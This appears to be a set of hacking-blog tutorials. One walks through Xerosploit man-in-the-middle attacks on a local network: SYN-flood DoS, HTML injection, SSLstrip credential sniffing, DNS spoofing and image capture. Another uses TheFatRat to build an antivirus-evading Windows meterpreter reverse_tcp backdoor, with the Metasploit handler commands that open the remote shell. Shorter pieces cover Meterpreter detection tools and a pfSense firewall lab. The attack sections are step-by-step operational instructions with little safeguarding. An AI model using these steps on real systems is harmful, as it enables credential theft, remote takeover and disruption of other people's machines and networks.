Xerosploit- A Man-In-The-Middle Attacking Tool

Networking is an important platform for an Ethical Hacker to check on, many of the threat can come from the internal network like network sniffing, Arp Spoofing, MITM e.t.c, This article is on Xerosploit which provides advanced MITM attack on your local network to sniff packets, steal password etc.

Table of Content

·         Introduction to Xerosploit

·         Man-In-The-Middle

·         Xerosploit Installation

·         PSCAN (Port Scanner)

·         DOS (Denial of service)

·         INJECTHTML (HTML INJECTION)

·         rdownload

·         SNIFF

·         dspoof

·         YPLAY

·         REPLACE

·         Driftnet

Introduction to Xerosploit

Xerosploit is a penetration testing toolkit whose goal is to perform man in the middle attacks for testing purposes. It brings various modules that allow to realise efficient attacks, and also allows to carry out denial of service attacks and port scanning. Powered by bettercap and nmap.

For those who are not familiar with Man-in-the-middle attack, welcome to the world of internal network attacks

Dependencies

nmap

hping3

build-essential

ruby-dev

libpcap-dev

libgmp3-dev

tabulate

terminaltables

Built-up with various Features:

Port scanning

Network mapping

Dos attack

Html code injection

Javascript code injection

Download intercaption and replacement

Sniffing

Dns spoofing

Background audio reproduction

Images replacement

Drifnet

Webpage defacement and more 

Man-In-The-Middle

A man-in-the-middle attack (MITM) is an attack where the attacker secretly relays and possibly alters the communication between two parties who believe they are directly communicating with each other. There are many open source tools available online for this attack like Ettercap, MITMF, Xerosploit, e.t.c

From Wikipedia.org

Xerosploit Installation

Xerosploit is an attack tool for MITM which can run only on Linux OS to do so follow the simple steps:-

Open up terminal and type

git clone https://github.com/LionSec/xerosploit.git

cd xerosploit

./install.py

It will ask to choose your operating system, here we have press 1 for Kali Linux.

Here it will display your network configuration including IP address, MAC address, gateway, and interface and host name. Now run the following command on xerosploit console to know the initial commands:

help

In this grid we have list of commands for our attack and we are going for man in middle attack, so I will choose scan command in my next step for scanning the whole network.

scan

 This command will scan complete network and will found all devices on your network.

As you can observe that it has scanned all the active hosts. There are so many hosts in this network; you have to choose your target from given result. I am going to select 192.168.1.105 for man in middle attack.

192.168.1.105

 In next comment it will ask for module you want to load for man in middle attack. Go with this comment and type help.

help

PSCAN (Port Scanner)

Let’s begin with pscan which is a port scanner, it will show you all the open ports on network computer and retrieve version of the programs running on the detected ports. Type run to execute pscan and it will show you all the open ports of victim’s network.

pscan

DOS (Denial of service)

Type “dos” to load the module, it will send a succession of TCP-SYN request packet to a target’s system to make the machine unresponsive to legitimate traffic which mean it is performing SYN Flood attack.

dos

run

press ctrl + c to stop

If you are aware of HPING tool then you can notice, this module is initially using HPING command for sending countless SYN request packet.

INJECTHTML (HTML INJECTION)

HTML injection is the vulnerability inside any website that occurs when the user input is not correctly sanitized or the output is not encoded and attacker is able to inject valid HTML code into a vulnerable web page. There are so many techniques which could be use element and attributes to submit HTML content.

So here we will replace victim’s html page with ours. Select any page of yours choice as you will notice that I have written “You have been hacked” in my index.html page which I will replace with the victim’s html page. Whatever page the victim will try to open he/she will see only the replaced one.

First create a page as I have created & save it on Desktop by the name of INDEX.html

Now run injecthtml command to load the injecthtml module. And then type run command to execute the injecthtml and enter the path where you have saved the file.

Bravo! We have successfully replaced the page as you can see in the picture below.

Hit ctrl^c to stop the attack.

SNIFF

Now run the following module to sniff all the traffic of the victim with command:

sniff

Then enter the following command to execute that module:

run

Now it will ask you if you want to use SSLTRIP to strip the HTTPS URl’s to HTTP so that we can they catch the login credentials in clear text. So enter y.

When the victim will enter the username and password it will sniff and capture all the data.

Now it will open a separate terminal in which we can see all the credentials in clear text. As you can see it has successfully captured the login credentials.

Hit ctrl^c to stop the attack.

dspoof

It load dspoof module which will supply false DNS information to all target browsed hosts Redirect all the http traffic to the specified one IP.

Now type run command to execute module and then it will ask the IP address where you want to redirect the traffic, here we have given our Kali Linux IP.

Now as soon as the victim will open any webpage he/she will get the page store in our web directories which we want to show him/her as shown in the picture below.

Hit ctrl^c to stop the attack.

YPLAY

Now let’s catch the other interesting module which is yplay. It will play background video sound in victim browser of your choice. So first execute yplay command followed by run command and give the video i.d what you have selected.

Open your browser and choose your favorite video in YouTube which you want to play in background in victim’s browser. If video having any advertisement then skip that and select id from url. Come back to xerosploit.

yplay

 To execute yplay module for attack type run.

run

 Insert you tube video ID which you have copy above from url in next step.

 febVHEarpeQ

Now in no matters what victim is doing on the laptop. If he will try to open any webpage, on the background he/shell will hear the song which we want him to listen.

Hit ctrl^c to stop the attack.

REPLACE

I hope all the attacks were quite interesting. But the next is going to be amazing. Now we will replace all the images of victim’s website with our images. For this first execute the command replace followed by run command. Don’t forget to give the path of the .png file which you have created as a surprise box for the victim.

replace

run

/root/Desktop/1.png

As the victim opens any url he/she will be amazed to see the replaced images of his/her website as shown here.

Hit ctrl^c to stop the attack.

Driftnet

 We will use driftnet module to capture all the images the victim is surfing on the web with following commands and it will save all captured picture in opt/xerosploit/xedriftnet.

driftnet

run

Once the attack is launched; we can sniff down all the images that he is viewing on his computer in our screen. We can do much more with this tool simply by using the move you can shake the browser contents 

As you can observe that all the images what victim is viewing on his/her system is captured in your system successfully.

Hopefully!  So it is needless to say that this tool XERSPLOIT is quite interesting and useful as well for performing so many attacks. I hope readers are gonna like this.

HaPpY hAcKing!!

How to Detect Meterpreter in Your PC

Anti-metasploit is an article to know about how can you detect if you are hacked by someone through metasploit or not. Today, most of the time we stumble upon the ways about how we can be hacked or how to hack someobe but no one tells you that how to detect if you are hacked.

So, therefore, in this article we will learn how to detect of you are hacked someone through metasploit. And to this there are two tools :

·         Antipwny

·         Antimeter

Both of these tools will help us to acheive our goal. These tools help you kill the meterpreter session that your hacker has gained. You can download these tools from --> http://www88.zippyshare.com/v/t6FjCuTR/file.html

Antipwny

When you will double click on the software, a daiogue box will open and it will show the meterpreter file running in your computer as show : 

Now, right click on the process and select kill process option.

And so you can detect the file and stop it too in just two simple steps.

Antimeter

When you open this software, it will scan the whole computer and it show the virus containing file. Also, it will ask you to kill the process or not. So, you type y for yes and the process will die.

Thus, the ways to detect if you have been hacked. These tools does not only allow us to detect the file but helps us to kill it also that too in two simple steps. When the steps are completed your hacker will loose the session making you safe and secure. So go on and raise your head against these exploiting hackers.

Hack Remote Windows 10 PC using FatRat

TheFatRat is an easy tool for generate backdoor with msfvenom ( part of metasploit framework ) and program compiles a C program with a meterpreter reverse_tcp payload In it that can then be executed on a windows host Program to create a C program after it is compiled that will bypass most AV

First, to install thefatrat we type the following command on terminal:

git clone https://github.com/Screetsec/TheFatRat.git

Once the cloning is done, go to the installed directory of fatrat and open it in terminal and type the following command to start it:

./fatrat

It will show you many options now select option 1 which is to CREATE BACKDOOR WITH MSFVENOM.

Now it will give a list of options to choose the format of the backdoor which you have to choose as per your requirements and need. To create a windows executable as a backdoor choose option 2.

 Now enter the LHOST IP i.e. your system IP and LPORT i.e. the port you want the reverse connection on your i.e. attacker system. In my case the LHOST is 192.168.0.104 and LPORT is 4444.

And then exit the script by selecting y when asked

Now the generated backdoor will be present in the output directory.

Now use any trick up your sleeve to transport the backdoor to the victim and set up reverse handler on metasploit with the following commands on the msf terminal-

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set lhost 192.168.0.104 (the attacker system IP)

set lport 4444

exploit

Now as soon as the backdoor is executed on the victim’s machine you will get a meterpreter shell as you can see in my case.

For More Details Visit Here

Firewall Pentest Lab Setup with pfsense in Vmware

Firewall: It is a computer system or network that is designed to block unauthorized access while permitting outward communication. Firewall holds a lot of importance our technical world as it assures our system's as well as data's security. And a firewall in a network helps us to secure the whole network. It acts as a network security device that grants or rejects network access to traffic flows between untrusted zones. Thus, importance of Firewall.

To secure a network we should always use a third party firewall instead of windows own firewall as it make configuration of all network easy and in one system only. If you will use windows own firewall you have to configure if PC by PC which will take a lot of your time.

Setting up a firewall can be complicating. Therefore in this article we will learn how to set up a firewall using PFSense. By setting this firewall we will create a wall between our networks which will delude our network into two parts i.e External network and internal network.

You can download ISO image for PFSenese from here:

Now that you have ISO image, setup PFSense in your virtual machine just like you setup your windows and turn its power on and PFSense will open: 

And it will boot itself automatically in few seconds:

Once it’s rebooted, select accept these Settings

From the next dialogues box select Quick/Easy Install.

When you click on ok it will allow installation process to begin without asking unnecessary questions:

And the installation begins:

Now for installing custom configuration select Standard Kernel option.

And it will start installing:

Now, select Reboot option so that the firewall can start.

Thus, rebooting will begin.

After the rebooting process, it will ask you if you want to setup VLAN's. Here just type n for no and hit enter.

Now it will ask you to name WAN and LAN interface. Give le0 name to WAN and le1 to LAN. Then just hit enter when it asks you to name optional interface.

It will show you the interfaces and their name now and will require your permission to proceed. Press y for yes as you are permitting it to proceed.

Now, in the following image you can see that it has automatically taken IP address for WAN i.e 192.168.1.7, if you wish to set a desired IP for WAN then choose 2 option and press 1 for the configuration of WAN.

It will ask you that if you want to assign IPv4 IP address. Here, press n for no. When you hit enter it will ask you if you want to assign IPv4 IP address. Here, enter your desired IP address and press enter. Then it will ask you to give subnet mask for the IP address that you have just entered. Now as our IP address was of C-class we will give 24 as subnet mask. After hitting enter it will ask you if you u want to give upstream gateway. Here, just press enter. And when it asks you to set IPv6 via DHCP6 then simply press enter without typing anything else as we do not require IPv6. And when it asks you for HTTP web configuration press n for no.

You can see that your desired IP for WAN has been set up. Hit enter to continue.

Similarly, you can setup LAN IP address by selecting of 2 for assigning IP address and select 2 for LAN.

Just like before, it will sak uou for the IP address of LAN and so you enter your LAN IP address. And then it will ask you for subnet mask, here we have given subnet mask of 8 as our IP is of A-class. Just hit enter when it asks you to enter upstream gateway. And also hit enter when it asks you to enter IPv6 as we do not require it. And then press y for HTTP revert option.

And just like this, your LAN IP address has been set up. Now, press enter to continue.

Now to check that your firewall has been configured properly, lets ping an IP address. Select option 7 and enter the IP address you want to ping. If it successfully pings that means your firewall has been configured successfully. And you can press enter to continue.

So, this is how you can install and configure your firewall to protect your network.